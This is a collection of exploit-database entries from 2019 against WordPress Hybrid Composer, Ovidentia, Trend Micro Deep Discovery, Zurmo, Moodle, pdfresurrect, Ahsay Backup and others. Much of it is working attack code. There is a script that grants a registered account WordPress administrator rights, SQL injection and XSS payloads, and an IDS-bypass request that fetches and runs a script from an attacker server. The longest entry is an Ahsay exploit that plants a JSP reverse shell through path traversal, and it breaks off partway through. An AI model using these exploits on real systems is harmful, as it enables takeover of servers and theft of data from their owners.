# Exploit Title: Wordpress Hybrid Composer <= 1.4.6 - Unauthenticated Configuration Access (Admin Takeover)
# Date: 2019-07-24
# Vendor Homepage: http://wordpress.framework-y.com
# Software Link:  http://wordpress.framework-y.com/hybrid-composer/
# Reference: https://labs.sucuri.net/wptf-hybrid-composer-unauthenticated-arbitrary-options-update/, https://wpvulndb.com/vulnerabilities/9452
# Affected version: <= 1.4.6
# Researcher: rootetsy
# Exploit Author: yasin
# Tested on: Linux
# Vulnerability discovered by rootetsy


# Summary
The plugin Hybrid Composer allows unauthenticated users to update any option in the options database table.

# Description
A Hybrid Composer plugin enables API routes by registering actions with either wp_ajax_ for authenticated or wp_ajax_nopriv_ for unauthenticated calls. Plugins using wp_ajax_nopriv_ actions should be fine as long as they are not giving access to methods with critical functionalities.
index.php in the WPTF Hybrid Composer plugin prior 1.4.7 for WordPress has an Unauthenticated Settings Change Vulnerability, related to certain wp_ajax_nopriv_ usage. Anyone can change the plugin's setting by simply sending a request with a hc_ajax_save_option action.


# Usage: python exploit.py 



###########################################################
import httplib, urllib
import sys 
import random
# pip install httplib urllib random

site = raw_input("[+] Target: ")
url = "/wp-admin/admin-ajax.php"
username = "user-%d" % random.randrange(1000000, 3000000)
email = raw_input("[+] E-mail: ")

def ChangeOption(site, url, option_name, content):
    params = urllib.urlencode({'action': 'hc_ajax_save_option', 'option_name': option_name, 'content': content})
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    conn = httplib.HTTPSConnection(site) # conn = httplib.HTTPConnection(site)
    conn.request("POST", url, params, headers)
    response = conn.getresponse()
    data = response.read()
    conn.close()
registration_url= "/wp-login.php"
def AdminTakeover(site, registration_url, user_login, user_email):
    params = urllib.urlencode({'action': 'register', 'user_login': user_login, 'user_email': user_email})
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    conn = httplib.HTTPSConnection(site) # conn = httplib.HTTPConnection(site)
    conn.request("POST", registration_url, params, headers)
    response = conn.getresponse()
    data = response.read()
    conn.close()
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")      
print "[+] Registering new admin user"
AdminTakeover(site, registration_url, username, email)
print "[+] Check your email for password: " + username + "[" + email + "]"
ChangeOption(site, url, "users_can_register", "0")
ChangeOption(site, url, "default_role", "subscriber") 


###########################################################

####################################################################################
#
# SWISSCOM CSIRT ADVISORY
# https://www.swisscom.ch/en/about/company/portrait/network/security/bug-bounty.html
#
####################################################################################
#
# Product:  Secure Change
# Vendor:   Tufin
# Subject:  Tufin SecureChange uses Richfaces 4.3.5, vulnerable to CVE-2015-0279 (unauthenticated RCE)
# CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H (base score 10.0)
# Finder:   Raphael Arrouas (https://www.linkedin.com/in/raphaelarrouas/)
# Coord:    Stephane Grundschober (csirt _at_ swisscom.com)
# Date:     July 15 2019
# Advisory URL: https://www.swisscom.ch/content/dam/swisscom/de/about/nachhaltigkeit/digitale-schweiz/sicherheit/bug-bounty/files/scbb-2986-tufin-secure-change.txt
# Vendor advisory: https://portal.tufin.com/articles/SecurityAdvisories/RichFaces-Expression-Language-Injection-27-5-2019
# CVE:      No CVE requested by Tufin
#
####################################################################################


Description
-----------
An unauthenticated Remote Code Execution vulnerability exists in Tufin SecureChange, 
allowing an attacker to take control of the SecureChange server and potentially
affect all managed firewalls.

Affected Product
----------------
All TOS versions with SecureChange deployments are affected. 
SecureTrack deployments are not affected for any TOS version.

Vulnerability
-------------
The SecureChange application uses Richfaces in version 4.3.5, which is vulnerable 
to CVE-2015-0279, an unauthenticated RCE by expression language injection within 
a serialized Java object. A web page exposing the vulnerability is accessible
without authentication, allowing unauthenticated attacker to execute arbitrary 
Java code and compromise the server. 

Remediation
-----------
TOS R19-1: The vulnerability fix is included in R19-1 HF1.1, released on May 27.
TOS R18-3: The vulnerability fix is included in R18-3 HF3.1, released on May 27.
TOS R18-2 and TOS R18-1: please contact support at support@tufin.com
Earlier versions of TOS: upgrade to R19-1 HF1.1 and above or R18-3 HF3.1 and above


Milestones
----------
2019-04-18   Discovery of the vulnerability, PoC and details communicated with Swisscom CSIRT
2019-04-21   Swisscom opens a support ticket at Tufin
2019-05-22   Tufin sends a security announcement to its customers
2019-05-27   Tufin releases Hotfixes correcting the issue
2019-05-29   Embargo agreed until 8th of July 2019
2019-07-15   Advisory published


Credits
-------
We would like to thank Raphaël Arrouas for his research
and responsible disclosure through Swisscom's Bug Bounty program
https://www.swisscom.ch/en/about/company/portrait/network/security/bug-bounty.html
as well as Tufin for the development of the hotfix.

#-------------------------------------------------------
# Exploit Title: [ Ovidentia CMS - SQL Injection (Authenticated) ]
# Date: [ 06/05/2019 ]
# CVE: [ CVE-2019-13978 ]
# Exploit Author:
# [ Fernando Pinheiro (n3k00n3) ]
# [ Victor Flores (UserX) ]
# Vendor Homepage: [
https://www.ovidentia.org/
]
# Version: [ 8.4.3 ]
# Tested on: [ Mac,linux - Firefox, safari ]
# Download [
http://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893
]
#
#           [ Kitsun3Sec Research Group ]
#--------------------------------------------------------

POC

Path: /ovidentia/index.php?tg=delegat&idx=mem&id=1
Type: GET
Vulnerable Field: id
Payload:
    1. tg=delegat&idx=mem&id=1 AND 3152=(SELECT (CASE WHEN (3152=3152) THEN 3152 ELSE (SELECT 9962 UNION SELECT
    2. tg=delegat&idx=mem&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QwTg)

URL:
https://target/ovidentia/index.php?tg=delegat&idx=mem&id=1
Using Request file
sqlmap.py -r req --random-agent --risk 3 --level 5 --dbms=mysql -p id --dbs

Using Get
./sqlmap.py -u
[http://target/ovidentia/index.php\?tg\=delegat\&idx\=mem\&id\=1](http://target/ovidentia/index.php/?tg\=delegat\&idx\=mem\&id\=1)
--cookie "Cookie: OV1364928461=6kb5jvu7f6lg93qlo3vl9111f8" --random-agent --risk 3 --level 5 --dbms=mysql -p id --dbs

#-------------------------------------------------------
# Exploit Title: [ Ovidentia CMS - XSS Ovidentia 8.4.3 ]
# Description: [ The vulnerability permits any kind of XSS attacks. Reflected, DOM and Stored XSS. ]
# Date: [ 06/05/2019 ]
# CVE: [ CVE-2019-13977 ]
# Exploit Author:
#     [ Fernando Pinheiro (n3k00n3) ]
#     [ Victor Flores  (UserX) ]
# Vendor Homepage: [
https://www.ovidentia.org/
]
# Version: [ 8.4.3 ]
# Tested on: [ Mac,linux - Firefox, safari ]
# Download: [
http://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893
]
#
#           [ Kitsun3Sec Research Group ]
#--------------------------------------------------------

POC

>========================================================
                      Stored XSS
>========================================================

1. POST
http://TARGET/ovidentia/index.php?tg=groups
Field:
    nom
2. POST
http://TARGET/ovidentia/index.php?tg=maildoms&idx=create&userid=0&bgrp=y
Fields:
    Nom
    Description
3. GET
http://TARGET/ovidentia/index.php?tg=delegat
Show groups
4. POST
http://TARGET/ovidentia/index.php?tg=site&idx=create

http://TARGET/ovidentia/index.php?tg=site&item=4
Fields:
    Nom
    address
    description
5. POST
http://TARGET/ovidentia/index.php?tg=admdir&idx=mdb&id=1
Fields:
    Libellé du champ
  Explosion:
http://TARGET/ovidentia/index.php?tg=forums&idx=notices

http://TARGET/ovidentia/index.php?tg=admdir&idx=dispdb&id=1

http://TARGET/ovidentia/index.php?tg=admdir&idx=lorddb&id=1
6. POST
http://TARGET/ovidentia/index.php?tg=notes&idx=Create
Fields: Notes
  Explosion:
http://TARGET/ovidentia/index.php?tg=notes&idx=List
7. POST
http://TARGET/ovidentia/index.php?tg=admfaqs&idx=Add
Fields: all
  Explosion:
http://TARGET/ovidentia/index.php?tg=admfaqs&idx=Categories#bab_faq_2
>========================================================
                    REFLECTED
>========================================================

1. GET
http://TARGET/ovidentia/index.php?tg=admoc&idx=addoc&item=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E

Sent from [ProtonMail](https://protonmail.com), encrypted email based in Switzerland.

[+] Credits: John Page (aka hyp3rlinx)    
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-DEEP-DISCOVERY-INSPECTOR-PERCENT-ENCODING-IDS-BYPASS.txt
[+] ISR: Apparition Security         


[Vendor]
www.trendmicro.com


[Product]
Deep Discovery Inspector

Deep Discovery Inspector is a network appliance that monitors all ports and over 105 different network protocols to discover advanced threats and targeted attacks
moving in and out of the network and laterally across it. The appliance detects and analyzes malware, command-and-control (C&C) communications, and evasive attacker
activities that are invisible to standard security defenses.



[Vulnerability Type]
Percent Encoding IDS Bypass


[CVE Reference]
Vendor decided not to release a CVE


[Security Issue]
Trend Micro Deep Discovery Inspector IDS will typically trigger alerts for malicious system commands like "Wget Commandline Injection" and they will be flagged as high.
Attacker payloads sent with normal ascii characters for example like "wget" or even if they have been HEX encoded like "\x77\x67\x65\x74" they will still get flagged and alerted on.

However, attackers can easily bypass these alerts by sending malicious commands in HEX preceded by percent sign chars "%", e.g. "%77%67%65%74" which also translates to "wget" and
will not get flagged or alerted on and may still be processed on the target system.

e.g.

DDI RULE 2452 
https://www.trendmicro.com/vinfo/us/threat-encyclopedia/network/ddi-rule-2452

Therefore, Trend Micro IDS alerts can be easily bypassed and the payload is still run by the vulnerable target if the payload is encoded using percent/hex encoding like %77%67%65%74.
That will not only bypass the IDE by having no alert triggered or notification sent but the application will still process the malicious command.

Importantly, the "wget" DDI Rule 2452 used is just an example and can potentially be any malicious request where the IDS checks the character encodings but fails to account for
percent encoded HEX character payload values. 


[Exploit/POC]
from socket import *
#Bypass TM DDI IDS e.g. Rule 2452 (Wget command line injection) PoC
#Discovery: hyp3rlinx - ApparitionSec
#Apparition Security
#Firewall Rule Bypass

IP = raw_input("[+] Trend Micro IDS")
PORT = 80

payload="/index.php?s=/index/vulnerable/app/invoke&function=call_user_func_array&vars[0]=system&vars[1][]=%77%67%65%74%20http://Attacker-Server/x.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a"
req = "GET "+payload+" HTTP/1.1\r\nHost"+IP+"\r\nConnection: close\r\n\r\n"

s=socket(AF_INET, SOCK_STREAM)
s.connect((IP, PORT))
s.send(req)
res=""

while True:
    res = s.recv(512)
    print res
    if res=="\n" or "</html>":
        break

s.close()


#Result is 200 HTTP OK and code execution on vuln app and No IDS Alert gets triggered.



[Network Access]
Remote



[Severity]
High



[Disclosure Timeline]
Vendor Notification: May 14, 2019
Vendor confirmed the IDS Bypass: May 20, 2019
Vendor informed that a DDI IDS enhancement has been made: July 18, 2019
July 23, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Yahei-PHP Prober v0.4.7 (speed) Remote HTML Injection Vulnerability


Vendor: Yahei.Net
Product web page: http://www.yahei.net
Affected version: 0.4.7

Summary: Detection of system web server operating environment.

Desc: Input passed to the GET parameter 'speed' is not properly
sanitised before being returned to the user. This can be exploited
to execute arbitrary HTML code in a user's browser session in context
of an affected site.

-----------------------------------------------------------------------
/prober.php:
---------

206: elseif(isset($_GET['speed']) and $_GET['speed']>0)
207: {
208:    $speed=round(100/($_GET['speed']/1000),2); //下载速度: $speed kb/s
209: }
...
...
1393:   <?php echo (isset($_GET['speed']))?"Download 1000KB Used <font color='#cc0000'>".$_GET['speed']."</font> Millisecond, Download Speed: "."<font color='#cc0000'>".$speed."</font>"." kb/s":"<font color='#cc0000'>&nbsp;No Test&nbsp;</font>" ?>

-----------------------------------------------------------------------

Tested on: OneinStack (Linux 3.10.0-862.14.4.el7.x86_64)
           nginx/1.14.0
           PHP/7.2.11


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2019-5531
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5531.php


16.07.2019

--


PoC:

http://domain.local:80/prober.php?speed=<marquee>marq</marquee>

Reflected Cross-site Scripting Vulnerability in Zurmo 3.2.6

Information
--------------------

Advisory by Netsparker
Name: Reflected Cross-site Scripting in Zurmo
Affected Software: Zurmo
Affected Versions: 3.2.6
Homepage: http://zurmo.org
Vulnerability: Reflected Cross-site Scripting
Severity: Critical
Status: Not Fixed
Netsparker Advisory Reference: NS-19-008

Technical Details
--------------------

URL: http://{DOMAIN}/zurmo/app/index.php/tasks/default/modalCreate?modalId=<scRipt>alert(“xss”)</scRipt>
Parameter Name: modalId
Parameter Type:GET
Attack Pattern:%3cscRipt%3ealert("xss")%3c%2fscRipt%3e

Vulnerability Repro
--------------------

Visit http://{DOMAIN}/zurmo/app/index.php/zurmo/group/create and enter a random group name and save it. Edit the new group from http://{DOMAIN}/zurmo/app/index.php/zurmo/group and replace the name with the attack pattern. Save and navigate back to http://{DOMAIN}/zurmo/app/index.php/zurmo/group . You’ll see the XSS pop up.

Advisory Timeline
--------------------

17th May 2019 - First Attempted Contact
24th July 2019 - Advisory Released

Credits & Authors
--------------------

These issues have been discovered by Umran Yildirimkaya while testing the Netsparker Web Application Security Scanner.

About Netsparker
--------------------

Netsparker web application security scanner finds and reports security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engine’s unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities.

Code Evaluation Vulnerability in Zurmo 3.2.6

Information
--------------------

Advisory by Netsparker
Name: Code Evaluation Vulnerability in Zurmo
Affected Software: Zurmo
Affected Versions: 3.2.6
Homepage: http://zurmo.org
Vulnerability: Code Evaluation
Severity: Critical
Status: Not Fixed
Netsparker Advisory Reference: NS-19-007

Technical Details
--------------------

URL: http://{DOMAIN}/zurmo/app/index.php/leads/default/?_=1557483150787&ajax=list-view&Contact_page=&Contact_sort=&selectedIds=phpinfo()
Parameter Name : selectedIds
Parameter Type: GET
Attack Pattern: phpinfo()

URL: http://{DOMAIN}/zurmo/app/index.php/opportunities/?_=1557483204319&ajax=list-view&Opportunity_page=&Opportunity_sort=&selectedIds=phpinfo()
Parameter Name : selectedIds
Parameter Type: GET
Attack Pattern: phpinfo()

URL: http://{DOMAIN}/zurmo/app/index.php/opportunities/default/?_=1557483206340&ajax=list-view&Opportunity_page=&Opportunity_sort=&selectedIds=phpinfo()
Parameter Name : selectedIds
Parameter Type: GET
Attack Pattern: phpinfo()

Proof-of-Concept
--------------------

Navigate to any of the URLs above and you'll see the phpinfo appear on the page. Changing the selectedIds parameter to any php code will reflect the expected output from the code on the page.

Advisory Timeline
--------------------

17th May 2019 - First Attempted Contact
24th July 2019 - Advisory Released

Credits & Authors
--------------------

These issues have been discovered by Umran Yildirimkaya while testing the Netsparker Web Application Security Scanner.

About Netsparker
--------------------

Netsparker web application security scanner finds and reports security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engine’s unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities.

# Exploit Title: Server Side Request Forgery in Moodle Filepicker
# Google Dork: /
# Date: 2019-07-25
# Exploit Author: Fabian Mosch & Nick Theisinger (r-tec IT Security GmbH)
# Vendor Homepage: https://moodle.org/
# Software Link: https://github.com/moodle/moodle
# Version: Moodle Versions 3.4, 3.3, 3.3.3, 3.2 to 3.2.6, 3.1 to 3.1.9 and 3.5.2
# Tested on: Moodle Version 3.5.2
# CVE : CVE-2018-1042

We found a SSRF vulnerability for Moodle version 3.5.2. An authenticated attacker can scan the internal network and exploit internal web services with blind injections. Probably we are dealing with CVE-2018-1042 mentioned here:
https://moodle.org/mod/forum/discuss.php?d=364381

In version 3.5.2 we were not able to view all internal web server content, only pictures (PNG, GIF, SVN and so on) were displayed as a JSON-list. But it is possible to do internal port scans via http:// and https:// protocols. Open ports with no response for HTTP requests resulted in a timeout, SSL services like OpenSSH gave an SSL Error. For web applications the HTTP headers can be found in the response (403 forbidden, 404 not Found and so on). Found web applications can be attacked via HTTP GET requests. The vulnerable script is "repository_ajax.php" and the parameter is "file".

Example exploitation request:

POST /repository/repository_ajax.php?action=signin HTTP/1.1
Host: VulnerableMoodleHost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://VulnerableMoodleHost/user/files.php
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 165
Connection: close
Cookie: MoodleSession=xxxxx;

file=InternalURL?parameter=XXEInjection&repo_id=5&p=&page=&env=filemanager&sesskey=xxxxxxxxxx

# Exploit Title: pdfresurrect 0.15 Buffer Overflow
# Date: 2019-07-26
# Exploit Author: j0lama
# Vendor Homepage: https://github.com/enferex/pdfresurrect
# Software Link: https://github.com/enferex/pdfresurrect
# Version: 0.15
# Tested on: Ubuntu 18.04
# CVE : CVE-2019-14267

Description
===========

PDFResurrect 0.15 has a buffer overflow via a crafted PDF file because
data associated with startxref and %%EOF is mishandled.


Additional Information
======================

There is a buffer overflow in pdfresurrect 0.14 caused by a malicious
 crafted pdf file.

In function pdf_load_xrefs at pdf.c file, it counts how many times the
strings '%%EOF' appear in the pdf file. Then for each xref the code
starts to rewind incrementing the pos_count variable until found a 'f'
character (the last character of the 'startxref' string). Then these
bytes between the 'f' and '%%EOF' will be read with the 'fread'
function and copied to a 256 char buffer. The 'pos_count' variable
tells 'freads' how many bytes has to copy. If malicious user crafted a
pdf file with more that 256 bytes between '%%EOF' and the immediately
previous 'f' then a buffer overflow will occur overwriting everything
after the 'buf' buffer.

In the code:
int pdf_load_xrefs(FILE *fp, pdf_t *pdf)
{
    int  i, ver, is_linear;
    long pos, pos_count;
    char x, *c, buf[256];

    c = NULL;

    /* Count number of xrefs */
    pdf->n_xrefs = 0;
    fseek(fp, 0, SEEK_SET);
    while (get_next_eof(fp) >= 0)
      ++pdf->n_xrefs;

    if (!pdf->n_xrefs)
      return 0;

    /* Load in the start/end positions */
    fseek(fp, 0, SEEK_SET);
    pdf->xrefs = calloc(1, sizeof(xref_t) * pdf->n_xrefs);
    ver = 1;
    for (i=0; i<pdf->n_xrefs; i++)
    {
        /* Seek to %%EOF */
        if ((pos = get_next_eof(fp)) < 0)
          break;

        /* Set and increment the version */
        pdf->xrefs[i].version = ver++;

        /* Rewind until we find end of "startxref" */
        pos_count = 0;
        while (SAFE_F(fp, ((x = fgetc(fp)) != 'f'))) <== The loop will continue incrementing pos_count until find a 'f' char
          fseek(fp, pos - (++pos_count), SEEK_SET);

        /* Suck in end of "startxref" to start of %%EOF */
        memset(buf, 0, sizeof(buf));
        SAFE_E(fread(buf, 1, pos_count, fp), pos_count, <== If pos_count > 256 then a buffer overflow occur
"Failed to read startxref.\n");
        c = buf;
        while (*c == '' || *c == '\n' || *c == '\r')
          ++c;

        /* xref start position */
        pdf->xrefs[i].start = atol(c);

This is a crafted PDF that produces a buffer overflow: 

http://www.mediafire.com/file/3540cyrl7o8p1rq/example_error.pdf/file

# Exploit Title: Authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50. (POC)
# Date: 26-6-2019
# Exploit Author: Wietse Boonstra
# Vendor Homepage: https://ahsay.com
# Software Link: http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe
# Version: 7.x < 8.1.1.50
# Tested on: Windows / Linux
# CVE : CVE-2019-10267


#!/usr/bin/env python3

"""
# Exploit Title: Authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50. 
# Date: 26-6-2019
# Exploit Author: Wietse Boonstra
# Vendor Homepage: https://ahsay.com
# Software Link: http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe
# Version: 7.x < 8.1.1.50 
# Tested on: Windows / Linux
# CVE : CVE-2019-10267

Session cookies are reflected in the JavaScript url: 

"""

import urllib3
import argparse
import base64
import re
import socket
from urllib.parse import urlencode
import gzip
import json
import hashlib

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def b64(s):
    try:
        return base64.b64encode(bytes(s, 'utf-8')).decode('utf-8')
    except:
        return base64.b64encode(bytes("", 'utf-8')).decode('utf-8')

def md5Sum(buf):
    hasher = hashlib.md5()
    hasher.update(buf)
    a = hasher.hexdigest()
    return a

class Exploit():
    def __init__(self, url, username="", password="", proxy="" ):
        self.url = url
        self.username = username
        self.password = password
        self.accountValid = None
        if proxy:
            self.http = urllib3.ProxyManager(proxy)
        else:
            self.http = urllib3.PoolManager()

    def fileActions(self, path="../../../../../../", action='list', recurse=False):
"""
        actions: download, list, delete, (upload  different function use self.upload)
"""
        try:
            if not self.checkAccount(self.username,self.password):
                return False
            if recurse:
                recurse = "true"
            else:
                recurse = "false"

            headers={
'X-RSW-Request-1':  '{}'.format(b64(self.password)),
'X-RSW-Request-0':  '{}'.format(b64(self.username))
            }
            # http = urllib3.ProxyManager("https://localhost:8080")

            path = {
'X-RSW-custom-encode-path':'{}'.format(path),
'recursive':'{}'.format(recurse)
                }
            path = urlencode(path)
            if action == "delete":
                r = self.http.request('DELETE', '{}/obs/obm7/file/{}?{}'.format(url,action,path),'',headers)
            else:
                r = self.http.request('GET', '{}/obs/obm7/file/{}?{}'.format(url,action,path),'',headers)
            if (r.status == 200):
                if (action == 'list'):
                    result = json.loads(gzip.decompress(r.data))
                    dash = '-' * 50
                    print(dash)
                    print('{:<11}{:<16}{:<20}'.format("Type", "Size","Name"))
                    print(dash)
                    for item in result["children"]:
                        print('{:<11}{:<16}{:<20}'.format(item['fsoType'], item['size'],item['name']))
                    print(dash) 
                else:
                    if action == "delete":
                        print ("File has been deleted")
                    else:
                        return (r.data.decode('utf-8'))
            else:
                print ("Something went wrong!")
                print (r.data)
                print (r.status)
        except Exception as e:
            print (e)
            pass

    def exploit(self, ip, port, uploadPath="../../webapps/cbs/help/en/", reverseShellFileName="test.jsp" ):
"""
        This function will setup the jsp reverse shell
"""
        if not self.checkAccount(self.username, self.password):
            return False

        reverseShell = '''<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>

<%
            class StreamConnector extends Thread
            {{
                InputStream az;
                OutputStream jk;

                StreamConnector( InputStream az, OutputStream jk )
                {{
                this.az = az;
                this.jk = jk;
                }}

                public void run()
                {{
                BufferedReader vo  = null;
                BufferedWriter ijb = null;
                try
                {{
                    vo  = new BufferedReader( new InputStreamReader( this.az ) );
                    ijb = new BufferedWriter( new OutputStreamWriter( this.jk ) );
                    char buffer[] = new char[8192];
                    int length;
                    while( ( length = vo.read( buffer, 0, buffer.length ) ) > 0 )
                    {{
                    ijb.write( buffer, 0, length );
                    ijb.flush();
                    }}
                }} catch( Exception e ){{}}
                try
                {{
                    if( vo != null )
                    vo.close();
                    if( ijb != null )
                    ijb.close();
                }} catch( Exception e ){{}}
                }}
            }}

            try
            {{
                String ShellPath;
            if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {{
            ShellPath = new String("/bin/sh");
            }} else {{
            ShellPath = new String("cmd.exe");
            }}

                Socket socket = new Socket( "{0}", {1} );
                Process process = Runtime.getRuntime().exec( ShellPath );
                ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
                ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
            }} catch( Exception e ) {{}}
            %>'''.format(str(ip), str(port))

        try:
            if (uploadPath == "../../webapps/cbs/help/en/"):
                callUrl = "{}/{}{}".format(self.url,re.sub("^../../webapps/",'',uploadPath),reverseShellFileName)
            exploitUrl = "{}{}".format(uploadPath,reverseShellFileName)
            print (exploitUrl)
            self.upload(exploitUrl, reverseShell)
            print ("Checking if file is uploaded.")

            if (md5Sum(self.fileActions(exploitUrl,'download').encode('utf-8')) == md5Sum(reverseShell.encode('utf-8'))):
                print ("File content is the same, upload OK!")
                print ("Triggering {}".format(callUrl))
                # http = urllib3.ProxyManager("https://localhost:8080")
                r = self.http.request('GET', '{}'.format(callUrl))
                if r.status == 200:
                    print ("Done, Check your netcat listener!")
                return True
            else: 
                return False
        except Exception as e:
            print (e)
            return False

    def upload(self, filePath, fileContent ):
"""
        Needs a valid username and password.
        Needs a filepath + filename to upload to. 
        Needs the file content.
"""

        b64UploadPath = b64("{}".format(filePath))
        try:
            if not self.checkAccount(self.username, self.password):
                return False
            headers={
'X-RSW-Request-0':  '{}'.format(b64(self.username)),
'X-RSW-Request-1':  '{}'.format(b64(self.password)),
'X-RSW-custom-encode-path': '{}'.format(b64UploadPath)
            }
            # http = urllib3.ProxyManager("https://localhost:8080")
            r = self.http.request(
'PUT', 
'{}/obs/obm7/file/upload'.format(self.url),
                body=fileContent,
                headers=headers)
            if (r.status == 201):
                print ("File {}".format(r.reason))
            else:
                print ("Something went wrong!")
                print (r.data)
                print (r.status)
        except Exception as e:
            print ("Something went wrong!")
            print (e)
            pass

    def checkAccount(self, username, password):
        try:
            headers={
'X-RSW-custom-encode-password':  '{}'.format(b64(password)),
'X-RSW-custom-encode-username':  '{}'.format(b64(username))
            }
            # http = urllib3.ProxyManager("https://localhost:8080")
            r = self.http.request('POST', '{}/obs/obm7/user/getUserProfile'.format(url),'',headers)
            if (r.data == b'CLIENT_TYPE_INCORRECT') or (r.status == 200):
                if self.accountValid is None:
                    print ("Account is valid with username: '{}' and password '{}'".format(username, password))
                self.accountValid = True
                return True
            elif (r.data == b'USER_NOT_EXIST'):
                if not self.accountValid is None:
                    print ("Username does not exist!")
                self.accountValid = False
                return False
            elif (r.data == b'PASSWORD_INCORRECT'):
                if self.accountValid is None:
                    print ("Password not correct but username '{}' is".format(username))
                self.accountValid = False
                return False
            else:
                if self.accountValid is None:
                    print ("Something went wrong!")
                self.accountValid = False
                return False
                # print (r.data)
                # print (r.status)
        except Exception as e:
            print (e)
            self.accountValid = False
            return False

    def checkTrialAccount(self):
        try:
            # http = urllib3.ProxyManager("https://localhost:8080")
            r = self.http.request('POST', '{}/obs/obm7/user/isTrialEnabled'.format(self.url),'','')
            if (r.status == 200 and r.data == b'ENABLED' ):
                print ("Server ({}) has Trial Account enabled, exploit should work!".format(self.url))
                return True
            else:
                print ("Server ({}) has Trial Account disabled, please use a valid account!".format(self.url))
                return False
        except Exception as e:
            print ("Something went wrong with url {} !".format(self.url))
            print (e)
            return False

    def addTrialAccount(self,alias=""):
        try:
            if not self.checkTrialAccount():
                return False

            headers={
'X-RSW-custom-encode-alias':  '{}'.format(b64(alias)), 
'X-RSW-custom-encode-password':  '{}'.format(b64(self.password)),
'X-RSW-custom-encode-username':  '{}'.format(b64(self.username))
            }
            # http = urllib3.ProxyManager("https://localhost:8080")
            r = self.http.request('POST', '{}/obs/obm7/user/addTrialUser'.format(url),'',headers)
            if (r.status == 200):
                print ("Account '{}' created with password '{}'".format(username, password))
            elif (r.data == b'LOGIN_NAME_IS_USED'):
                print ("Username is in use!")
            elif (r.data == b'PWD_COMPLEXITY_FAILURE'):
                print ("Password not complex enough")
            else:
                print ("Something went wrong!")
                print (r.data)
                print (r.status)
        except Exception as e:
            print (e)
            pass


if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        __file__,
        description="Exploit for AhsayCBS v6.x < v8.1.1..50",
        usage="""
    Check if Trial account is enabled: %(prog)s --host https://172.16.238.213/ -c
    Create Trial account: %(prog)s --host https://172.16.238.213/ -a -u test01 -p 'Welcome01!'
    Create Trial account with stored XSS: %(prog)s --host https://172.16.238.213/ -a -u test01 -p 'Welcome01!' -x --xssvalue "'><script>alert(1)</script>"
    Delete file: %(prog)s --host https://172.16.238.213/ -u test01 -p Welcome01! --action delete --path ../../../../../../../../test.txt
    List files in dir: %(prog)s --host https://172.16.238.213/ -u test01 -p Welcome01! --action list --path ../../../../../../../../
    Upload a file: %(prog)s --host https://172.16.238.213/ -u test01 -p Welcome01! --action upload --localfile test.txt --path ../../../../../../../../ --filename test.txt
    Upload reverse shell: %(prog)s --host https://172.16.238.213/ -u test01 -p Welcome01! -e --ip 172.16.238.1 --port 4444
"""

    )
    manda = parser.add_argument_group("Mandatory options")
    manda.add_argument("--host",
        help="Url of AhsayCBS server",
        # required=True
    )
    check = parser.add_argument_group("Check options")
    check.add_argument("-c", "--check",
        help="Check if host is vulnerable",
        action="store_true"
    )

    add = parser.add_argument_group("Add account options")
    add.add_argument("-a","--add",
        help="Add trial account",
        action="store_true"
    )
    add.add_argument("-u","--username",
        help="username to create"
    )
    add.add_argument("-p","--password",
        help="Password to create"
    )

    exploit = parser.add_argument_group("Exploit options")
    exploit.add_argument("-e", "--exploit",
        help="Run reverse shell exploit",
        action="store_true"
    )
    exploit.add_argument("--ip",
        help="Set the attackers IP",
        default="127.0.0.1"
    )
    exploit.add_argument("--port",
        help="Set the attackers port",
        default="4444"
    )

    #Optional
    xss = parser.add_argument_group("XSS")
    xss.add_argument("-x","--xss",
        help="Use XSS in alias field.",
        action="store_true",
        default=False
    )
    xss.add_argument("--xssvalue",
        help="Custom XSS value (must start with '>)",
        default="'><script>alert(1)</script>",
        required=False
    )


    # list files
